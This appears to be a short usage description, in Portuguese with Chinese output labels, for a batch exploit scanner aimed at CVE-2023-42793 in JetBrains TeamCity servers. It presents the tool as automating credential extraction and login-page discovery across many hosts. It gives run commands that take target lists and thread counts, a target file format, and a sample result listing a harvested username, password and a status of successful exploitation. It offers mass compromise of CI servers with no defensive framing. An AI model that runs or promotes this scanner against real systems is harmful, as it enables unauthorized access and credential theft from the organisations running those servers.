
Scanner de vulnerabilidade em lote para CVE-2023-42793 visando servidores JetBrains TeamCity. Automatiza a extração de credenciais e a descoberta de URLs de login em múltiplos hosts.
bash
python teamcity_scan.py -f targets.txt -o results.txt
python teamcity_scan.py -u http://target.com:8111 -o result.txt
python teamcity_scan.py -f urls.txt -t 20 -o vuln.txt
Formato do arquivo de alvos (targets.txt): text http://192.168.1.100:8111 https://teamcity.example.com 10.0.0.1:8111 example.com
Formato de saída (results.txt): text 目标: http://192.168.1.100:8111 用户名: TeamCityUser1234 密码: TeamCity@2023 登录地址: http://192.168.1.100:8111/login.html 状态: 漏洞利用成功